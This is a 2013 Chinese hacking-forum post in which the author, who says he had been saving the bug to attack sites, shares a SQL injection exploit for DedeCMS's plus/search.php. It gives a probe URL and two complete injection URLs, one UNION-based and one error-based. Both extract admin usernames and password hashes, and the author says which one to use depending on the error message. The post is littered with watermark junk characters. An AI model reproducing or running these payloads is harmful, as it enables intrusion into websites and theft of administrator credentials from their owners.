找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2111|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ3 X; G) K* e6 H

6 K$ K7 L" |8 E: E4 Z4 F5 Y3 ~% t# t哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。$ `# f' X8 G( o' [

3 f) ]* G/ p$ ~, P既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; t! x0 y1 r3 v, h9 `4 a. a0 \% F/ a7 _
我一般是这样测试的:
# b5 c# B- B5 U- w, T  ^' L# M. V0 c9 q4 P, T7 ]) X( ^
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
0 x5 c  r/ U' z5 `: G8 e5 V( s; b, I$ v, {1 H
转载不加作者名的没JJ
2 h; i6 I* w: J% \6 P, J! ^( z9 z7 B5 |3 F. a
作者:鬼哥
7 p" W. o$ I8 t8 I9 e" x1 G1 Y& n. L1 R) z

" h* ^0 g# {5 Y3 V9 w; g+ R1 B% {3 k
看结果如果提示) r3 T/ y. a7 {# B; @
0 l6 H3 |$ a) T% A- [" P% s6 s! L
Safe Alert: Request Error step 2 !5 N5 R' T: i% q

; P( D$ r# K9 I3 C, ^7 n! [那么直接用下面的exp
4 L1 u; k/ [# @
) c& \) g( V# K! t! Wxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
% ?" }, F4 Z  z
7 s# \" j2 q5 ?9 u. D: ?+ Y* l; V
看结果如果提示
7 V: m' s$ G& F! M9 H4 S* L7 m* L0 o
Safe Alert: Request Error step 1 !
+ b3 x* a% `7 m. z9 [" O. H1 c+ J% B1 }1 X8 R) ?1 H
那么直接用下面的exp
9 S5 ~- d9 b! w0 L/ J4 j, ]2 \/ x$ i- |, G  b. q+ S
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
! v! ^9 a7 X* J
4 V, d! b1 }, K4 L8 d, j1 K; S" B+ e9 T( u% L
如果正常显示证明漏洞不存在了。
! b7 t* l: C6 g* f1 V! K" s/ C, y9 T+ C: o) L
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表